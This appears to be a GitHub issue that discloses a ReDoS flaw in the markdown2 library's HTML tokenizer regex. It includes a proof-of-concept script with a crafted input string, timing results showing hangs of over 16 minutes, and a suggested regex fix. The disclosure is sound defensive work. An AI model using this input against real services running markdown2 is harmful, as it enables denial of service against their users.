-
Notifications
You must be signed in to change notification settings - Fork 443
Description
Describe the bug
Hi team, thanks for your great work! I think I found a small vulnerability that might lead to DDoS in the system
At line 1265 in markdown2.py
the regex _sorta_html_tokenize_re is vulnerable to ReDoS when it is used in
for token in self._sorta_html_tokenize_re.split(text):
To Reproduce
I have a test file here and can be run directly
import markdown2
import time
for repeat_count in range(0,5000,500):
start_time = time.time()
markdown_text = "<p m=\"1\"" * repeat_count + " "* repeat_count + " " * repeat_count + "</div"
start_time = time.time()
html_output = markdown2.markdown(markdown_text, extras=["markdown-in-html"])
end_time = time.time()
print(f"repeat_count/length: {repeat_count}/{len(markdown_text)} Time taken: {end_time - start_time:.6f} seconds")The result is like this
repeat_count/length: 0/5 Time taken: 0.004103 seconds
repeat_count/length: 500/5005 Time taken: 3.075934 seconds
repeat_count/length: 1000/10005 Time taken: 23.623668 seconds
repeat_count/length: 1500/15005 Time taken: 78.709412 seconds
repeat_count/length: 2000/20005 Time taken: 186.460569 seconds
repeat_count/length: 2500/25005 Time taken: 361.830719 seconds
repeat_count/length: 3000/30005 Time taken: 625.041665 seconds
repeat_count/length: 3500/35005 Time taken: 991.112904 secondsAs we can see, the time consumption increase significantly, and only 30k chars can lead to the program hang for more than 16 mins.
Expected behavior
I think we can add a limit like replace \s* with \s{0,100} or maybe divide the regex into multiple sub-regex? Maybe it can help to solve the recursion problem.
For the regex _sorta_html_tokenize_re , the issue occurs due to the subregex
(?: # attributes
\s+ # whitespace after tag
(?:[^\t<>"'=/]+:)?
[^<>"'=/]+= # attr name
(?:".*?"|'.*?'|[^<>"'=/\s]+) # value, quoted or unquoted. If unquoted, no spaces allowed
)*
\s*/?>The (...)* and \s* both try to eagerly match strings, leading to massive recusrion.
I tried to remove one of them from the regex, and the performance significantly improved
# remove \s*
repeat_count/length: 0/5 Time taken: 0.004091 seconds
repeat_count/length: 500/6005 Time taken: 0.080678 seconds
repeat_count/length: 1000/12005 Time taken: 0.326295 seconds
repeat_count/length: 1500/18005 Time taken: 0.712929 seconds
repeat_count/length: 2000/24005 Time taken: 1.258733 seconds
repeat_count/length: 2500/30005 Time taken: 2.067534 seconds
repeat_count/length: 3000/36005 Time taken: 2.911231 seconds
repeat_count/length: 3500/42005 Time taken: 3.897797 seconds
repeat_count/length: 4000/48005 Time taken: 5.017783 seconds
repeat_count/length: 4500/54005 Time taken: 6.552440 seconds# remove `(...)*`
repeat_count/length: 0/5 Time taken: 0.004098 seconds
repeat_count/length: 500/6005 Time taken: 0.088631 seconds
repeat_count/length: 1000/12005 Time taken: 0.347793 seconds
repeat_count/length: 1500/18005 Time taken: 0.774725 seconds
repeat_count/length: 2000/24005 Time taken: 1.367911 seconds
repeat_count/length: 2500/30005 Time taken: 2.169432 seconds
repeat_count/length: 3000/36005 Time taken: 3.167773 seconds
repeat_count/length: 3500/42005 Time taken: 4.229510 seconds
repeat_count/length: 4000/48005 Time taken: 5.558357 seconds
repeat_count/length: 4500/54005 Time taken: 6.914844 seconds